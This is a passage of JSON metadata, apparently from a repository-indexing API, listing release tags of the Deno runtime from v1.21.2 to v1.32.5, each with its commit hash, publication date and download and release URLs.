deno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland